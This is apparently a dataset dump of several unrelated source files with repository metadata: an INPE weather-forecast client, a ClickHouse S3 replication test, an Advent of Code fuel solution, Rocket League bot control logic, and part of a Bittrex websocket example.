hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7078d551863ea4d0444a10665588c50f03bd458
| 2,458
|
py
|
Python
|
util/info_clima_inpe.py
|
Projeto-Integrador-BD/ivy-projeto-bd
|
6796c6601c5b1465b0f7d49593f0575f01bc068f
|
[
"MIT"
] | 1
|
2020-05-14T03:41:01.000Z
|
2020-05-14T03:41:01.000Z
|
util/info_clima_inpe.py
|
Projeto-Integrador-BD/ivy-projeto-bd
|
6796c6601c5b1465b0f7d49593f0575f01bc068f
|
[
"MIT"
] | null | null | null |
util/info_clima_inpe.py
|
Projeto-Integrador-BD/ivy-projeto-bd
|
6796c6601c5b1465b0f7d49593f0575f01bc068f
|
[
"MIT"
] | 2
|
2020-05-16T21:31:31.000Z
|
2020-06-25T01:05:55.000Z
|
from xml.dom import minidom
from urllib import request
import xmltodict, json
def get_informacoes_clima_7_dias(latitude, longitude):
endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
response = request.urlopen(endpoint_lat_lng)
data = json.dumps(xmltodict.parse(response))
return json.loads(data)
def get_texto_previsao_tempo(latitude, longitude):
clima = get_informacoes_clima_7_dias(latitude, longitude)
previsao_hoje = clima['cidade']['previsao'][0]
previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
previsao_texto += ", informações do INPE"
return previsao_texto
def get_descricao_tempo_by_sigla(sigla):
return siglas_tempo[sigla]
siglas_tempo = {
"ec": "Encoberto com Chuvas Isoladas",
"ci": "Chuvas Isoladas",
"c": "Chuva",
"in": "Instável",
"pp": "Poss. de Pancadas de Chuva",
"cm": "Chuva pela Manhã",
"cn": "Chuva a Noite",
"pt": "Pancadas de Chuva a Tarde",
"pm": "Pancadas de Chuva pela Manhã",
"np": "Nublado e Pancadas de Chuva",
"pc": "Pancadas de Chuva",
"pn": "Parcialmente Nublado",
"cv": "Chuvisco",
"ch": "Chuvoso",
"t": "Tempestade",
"ps": "Predomínio de Sol",
"e": "Encoberto",
"n": "Nublado",
"cl": "Céu Claro",
"nv": "Nevoeiro",
"g": "Geada",
"ne": "Neve",
"nd": "Não Definido",
"pnt": "Pancadas de Chuva a Noite",
"psc": "Possibilidade de Chuva",
"pcm": "Possibilidade de Chuva pela Manhã",
"pct": "Possibilidade de Chuva a Tarde",
"pcn": "Possibilidade de Chuva a Noite",
"npt": "Nublado com Pancadas a Tarde",
"npn": "Nublado com Pancadas a Noite",
"ncn": "Nublado com Poss. de Chuva a Noite",
"nct": "Nublado com Poss. de Chuva a Tarde",
"ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
"npm": "Nublado com Pancadas pela Manhã",
"npp": "Nublado com Possibilidade de Chuva",
"vn": "Variação de Nebulosidade",
"ct": "Chuva a Tarde",
"ppn": "Poss. de Panc. de Chuva a Noite",
"ppt": "Poss. de Panc. de Chuva a Tarde",
"ppm": "Poss. de Panc. de Chuva pela Manhã"
}
| 35.623188
| 125
| 0.638731
|
from xml.dom import minidom
from urllib import request
import xmltodict, json
def get_informacoes_clima_7_dias(latitude, longitude):
endpoint_lat_lng = "http://servicos.cptec.inpe.br/XML/cidade/7dias/" + latitude + "/" + longitude + "/previsaoLatLon.xml"
response = request.urlopen(endpoint_lat_lng)
data = json.dumps(xmltodict.parse(response))
return json.loads(data)
def get_texto_previsao_tempo(latitude, longitude):
clima = get_informacoes_clima_7_dias(latitude, longitude)
previsao_hoje = clima['cidade']['previsao'][0]
previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
previsao_texto += ", informações do INPE"
return previsao_texto
def get_descricao_tempo_by_sigla(sigla):
return siglas_tempo[sigla]
siglas_tempo = {
"ec": "Encoberto com Chuvas Isoladas",
"ci": "Chuvas Isoladas",
"c": "Chuva",
"in": "Instável",
"pp": "Poss. de Pancadas de Chuva",
"cm": "Chuva pela Manhã",
"cn": "Chuva a Noite",
"pt": "Pancadas de Chuva a Tarde",
"pm": "Pancadas de Chuva pela Manhã",
"np": "Nublado e Pancadas de Chuva",
"pc": "Pancadas de Chuva",
"pn": "Parcialmente Nublado",
"cv": "Chuvisco",
"ch": "Chuvoso",
"t": "Tempestade",
"ps": "Predomínio de Sol",
"e": "Encoberto",
"n": "Nublado",
"cl": "Céu Claro",
"nv": "Nevoeiro",
"g": "Geada",
"ne": "Neve",
"nd": "Não Definido",
"pnt": "Pancadas de Chuva a Noite",
"psc": "Possibilidade de Chuva",
"pcm": "Possibilidade de Chuva pela Manhã",
"pct": "Possibilidade de Chuva a Tarde",
"pcn": "Possibilidade de Chuva a Noite",
"npt": "Nublado com Pancadas a Tarde",
"npn": "Nublado com Pancadas a Noite",
"ncn": "Nublado com Poss. de Chuva a Noite",
"nct": "Nublado com Poss. de Chuva a Tarde",
"ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
"npm": "Nublado com Pancadas pela Manhã",
"npp": "Nublado com Possibilidade de Chuva",
"vn": "Variação de Nebulosidade",
"ct": "Chuva a Tarde",
"ppn": "Poss. de Panc. de Chuva a Noite",
"ppt": "Poss. de Panc. de Chuva a Tarde",
"ppm": "Poss. de Panc. de Chuva pela Manhã"
}
| true
| true
|
f7078d55c3300fc63750cbf84fa1adc5f89b9ed6
| 5,396
|
py
|
Python
|
tests/integration/test_s3_zero_copy_replication/test.py
|
tianyiYoung/ClickHouse
|
41012b5ba49df807af52fc17ab475a21fadda9b3
|
[
"Apache-2.0"
] | 1
|
2021-06-25T07:09:27.000Z
|
2021-06-25T07:09:27.000Z
|
tests/integration/test_s3_zero_copy_replication/test.py
|
tianyiYoung/ClickHouse
|
41012b5ba49df807af52fc17ab475a21fadda9b3
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_s3_zero_copy_replication/test.py
|
tianyiYoung/ClickHouse
|
41012b5ba49df807af52fc17ab475a21fadda9b3
|
[
"Apache-2.0"
] | 1
|
2021-04-29T07:46:46.000Z
|
2021-04-29T07:46:46.000Z
|
import logging
import time
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
with_minio=True,
with_zookeeper=True)
cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
with_minio=True,
with_zookeeper=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
def get_large_objects_count(cluster, size=100):
minio = cluster.minio_client
counter = 0
for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
if obj.size >= size:
counter = counter + 1
return counter
def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
while timeout > 0:
if get_large_objects_count(cluster, size) == expected:
return
timeout -= 1
time.sleep(1)
assert get_large_objects_count(cluster, size) == expected
@pytest.mark.parametrize(
"policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
ORDER BY id
SETTINGS storage_policy='{}'
"""
.format('{replica}', policy)
)
node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
# Based on version 20.x - should be only one file with size 100+ (checksums.txt), used by both nodes
assert get_large_objects_count(cluster) == 1
node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
time.sleep(1)
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
# Based on version 20.x - two parts
wait_for_large_objects_count(cluster, 2)
node1.query("OPTIMIZE TABLE s3_test")
# Based on version 20.x - after merge, two old parts and one merged
wait_for_large_objects_count(cluster, 3)
# Based on version 20.x - after cleanup - only one merged part
wait_for_large_objects_count(cluster, 1, timeout=60)
node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")
def test_s3_zero_copy_on_hybrid_storage(cluster):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
ORDER BY id
SETTINGS storage_policy='hybrid'
"""
.format('{replica}')
)
node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
# Total objects in S3
s3_objects = get_large_objects_count(cluster, 0)
node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
# Check that after moving partition on node2 no new obects on s3
wait_for_large_objects_count(cluster, s3_objects, size=0)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
| 39.101449
| 136
| 0.661601
|
import logging
import time
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
with_minio=True,
with_zookeeper=True)
cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
with_minio=True,
with_zookeeper=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
def get_large_objects_count(cluster, size=100):
minio = cluster.minio_client
counter = 0
for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
if obj.size >= size:
counter = counter + 1
return counter
def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
while timeout > 0:
if get_large_objects_count(cluster, size) == expected:
return
timeout -= 1
time.sleep(1)
assert get_large_objects_count(cluster, size) == expected
@pytest.mark.parametrize(
"policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
ORDER BY id
SETTINGS storage_policy='{}'
"""
.format('{replica}', policy)
)
node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
assert get_large_objects_count(cluster) == 1
node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
time.sleep(1)
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
wait_for_large_objects_count(cluster, 2)
node1.query("OPTIMIZE TABLE s3_test")
wait_for_large_objects_count(cluster, 3)
wait_for_large_objects_count(cluster, 1, timeout=60)
node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")
def test_s3_zero_copy_on_hybrid_storage(cluster):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
ORDER BY id
SETTINGS storage_policy='hybrid'
"""
.format('{replica}')
)
node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
s3_objects = get_large_objects_count(cluster, 0)
node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
wait_for_large_objects_count(cluster, s3_objects, size=0)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
| true
| true
|
f7078da757194a2016dd5bedc4aab55b97d82856
| 551
|
py
|
Python
|
07/part1.py
|
diabonas/aoc2021
|
7b79df77319a77eda1673b652dfed0493d74025e
|
[
"MIT"
] | null | null | null |
07/part1.py
|
diabonas/aoc2021
|
7b79df77319a77eda1673b652dfed0493d74025e
|
[
"MIT"
] | null | null | null |
07/part1.py
|
diabonas/aoc2021
|
7b79df77319a77eda1673b652dfed0493d74025e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# SPDX-License-Identifier: MIT
import math
with open("input", "r") as file:
horizontal_positions = list(map(int, file.readline().split(",")))
cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
fuel = sum(abs(p - align) for p in horizontal_positions)
if fuel < cheapest:
cheapest = fuel
# Alternative:
# align = int(statistics.median(horizontal_positions))
# cheapest = sum(abs(p - align) for p in horizontal_positions)
print(f"cheapest total fuel: {cheapest}")
| 27.55
| 77
| 0.707804
|
import math
with open("input", "r") as file:
horizontal_positions = list(map(int, file.readline().split(",")))
cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
fuel = sum(abs(p - align) for p in horizontal_positions)
if fuel < cheapest:
cheapest = fuel
print(f"cheapest total fuel: {cheapest}")
| true
| true
|
f7078df968cb5fab7c5b3b2f7582059257952574
| 4,973
|
py
|
Python
|
agents/RashBot/Handling.py
|
inXS212/Saltie
|
78224ecdcbe049c9a798c5cfac12c223efc0596f
|
[
"MIT"
] | null | null | null |
agents/RashBot/Handling.py
|
inXS212/Saltie
|
78224ecdcbe049c9a798c5cfac12c223efc0596f
|
[
"MIT"
] | null | null | null |
agents/RashBot/Handling.py
|
inXS212/Saltie
|
78224ecdcbe049c9a798c5cfac12c223efc0596f
|
[
"MIT"
] | null | null | null |
from Util import *
def controls(s):
s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
s.steer = curve1(Range180(s.a - s.av / 55, 1))
s.pitch = regress(-s.i - s.iv / 17)
s.yaw = regress(Range180(s.a - s.av / 12, 1))
s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
s.boost = s.throttle > .5 and abs(s.a) < .12 and (
s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
s.powerslide = s.jump = 0
# general powerslide
if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
# sliding
(ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
# turning
s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
# landing
s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
s.powerslide = 1
# turn 180°
if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
if abs(s.a) > 0.98:
s.steer = 1
if s.d2 > 600 and s.pyv < -90:
if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
ang_dif(s.a, s.pva, 1) < .25):
s.powerslide = 1
s.steer = -sign(s.steer)
elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
s.throttle = 1
# three point turn
if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
and abs(s.pyv) < 550 and abs(s.yv) < 550):
s.throttle = -sign(s.throttle)
s.steer = -sign(s.steer)
# general jump
if (s.z > 140 and s.tojump and (
# flying jump
(s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
or # directly below the ball
(s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
s.jumper = 1
# jumping off walls
if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
s.poG and s.pL[2] > 1900 and s.d2pv < 120):
s.jump = 1
# flip
if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
s.dodge = 1
s.djL = 's.tL'
# jump for wavedash
if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
s.jump = 1
# forward wavedash
if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
not s.poG and s.pV[2] < -210 and s.wavedash):
s.jump = 1
s.pitch = -1
s.yaw = s.roll = 0
if s.shoot:
dodge_hit(s)
# handling long jumps
if s.jumper and s.jcount > 0:
s.jump = 1
if not s.poG and (s.ljump != s.lljump or not s.ljump):
s.pitch = s.yaw = s.roll = 0
if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
s.jump = not s.ljump
# handling pre-dodge
if s.dodge and s.jcount > 0:
s.jump = s.poG or s.z > 0
if 0.08 < s.airtime and s.pL[2] > 45:
exec("s.dja = dodge_ang(s, " + s.djL + ")")
s.jump = not s.ljump
s.pitch = abs(s.dja) * 2 - 1
s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
s.roll = 0
s.djT = s.time
# handling post-dodge
if 0.05 < s.djtime < 0.25:
s.pitch = s.roll = s.yaw = 0
if 0.25 < s.djtime < 0.65:
if abs(s.a) < 0.5:
if abs(s.a) < 0.8:
s.pitch = -sign(s.iv)
else:
s.pitch = s.yaw = s.roll = 0
if not s.index:
0
def dodge_hit(s):
d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
# dodge hit
if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
# dodge to shoot
if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
# dodge to clear
or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
# dodge for
or s.kickoff):
s.dodge = 1
s.djL = 's.bL + s.bV/60'
def dodge_ang(s, tL):
L = tL - s.pL
yaw = Range180(s.pR[1] - U / 2, U) * pi / U
x, y = rotate2D(L[0], L[1], -yaw)
a = math.atan2(y, x)
return Range180(a / pi - .5, 1)
| 33.829932
| 92
| 0.465916
|
from Util import *
def controls(s):
s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
s.steer = curve1(Range180(s.a - s.av / 55, 1))
s.pitch = regress(-s.i - s.iv / 17)
s.yaw = regress(Range180(s.a - s.av / 12, 1))
s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
s.boost = s.throttle > .5 and abs(s.a) < .12 and (
s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
s.powerslide = s.jump = 0
if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
(ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
s.powerslide = 1
if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
if abs(s.a) > 0.98:
s.steer = 1
if s.d2 > 600 and s.pyv < -90:
if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
ang_dif(s.a, s.pva, 1) < .25):
s.powerslide = 1
s.steer = -sign(s.steer)
elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
s.throttle = 1
if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
and abs(s.pyv) < 550 and abs(s.yv) < 550):
s.throttle = -sign(s.throttle)
s.steer = -sign(s.steer)
if (s.z > 140 and s.tojump and (
(s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
or (s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
s.jumper = 1
if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
s.poG and s.pL[2] > 1900 and s.d2pv < 120):
s.jump = 1
if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
s.dodge = 1
s.djL = 's.tL'
if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
s.jump = 1
if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
not s.poG and s.pV[2] < -210 and s.wavedash):
s.jump = 1
s.pitch = -1
s.yaw = s.roll = 0
if s.shoot:
dodge_hit(s)
if s.jumper and s.jcount > 0:
s.jump = 1
if not s.poG and (s.ljump != s.lljump or not s.ljump):
s.pitch = s.yaw = s.roll = 0
if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
s.jump = not s.ljump
if s.dodge and s.jcount > 0:
s.jump = s.poG or s.z > 0
if 0.08 < s.airtime and s.pL[2] > 45:
exec("s.dja = dodge_ang(s, " + s.djL + ")")
s.jump = not s.ljump
s.pitch = abs(s.dja) * 2 - 1
s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
s.roll = 0
s.djT = s.time
if 0.05 < s.djtime < 0.25:
s.pitch = s.roll = s.yaw = 0
if 0.25 < s.djtime < 0.65:
if abs(s.a) < 0.5:
if abs(s.a) < 0.8:
s.pitch = -sign(s.iv)
else:
s.pitch = s.yaw = s.roll = 0
if not s.index:
0
def dodge_hit(s):
d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
or s.kickoff):
s.dodge = 1
s.djL = 's.bL + s.bV/60'
def dodge_ang(s, tL):
L = tL - s.pL
yaw = Range180(s.pR[1] - U / 2, U) * pi / U
x, y = rotate2D(L[0], L[1], -yaw)
a = math.atan2(y, x)
return Range180(a / pi - .5, 1)
| true
| true
|
f7078e8537d57e0975183b3c74fcab4086d16eb4
| 650
|
py
|
Python
|
bittrex_websocket/summary_state.py
|
ericsomdahl/python-bittrex-websocket
|
6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0
|
[
"MIT"
] | 2
|
2017-12-03T08:16:32.000Z
|
2018-12-02T09:00:25.000Z
|
bittrex_websocket/summary_state.py
|
ericsomdahl/python-bittrex-websocket
|
6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0
|
[
"MIT"
] | null | null | null |
bittrex_websocket/summary_state.py
|
ericsomdahl/python-bittrex-websocket
|
6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0
|
[
"MIT"
] | 3
|
2018-01-09T03:12:51.000Z
|
2020-07-10T23:54:36.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/summary_state.py
# Stanislav Lazarov
from time import sleep
from bittrex_websocket.websocket_client import BittrexSocket
if __name__ == "__main__":
class MyBittrexSocket(BittrexSocket):
def on_open(self):
self.client_callbacks = ['updateSummaryState']
def on_debug(self, **kwargs):
pass
def on_message(self, *args, **kwargs):
print(args)
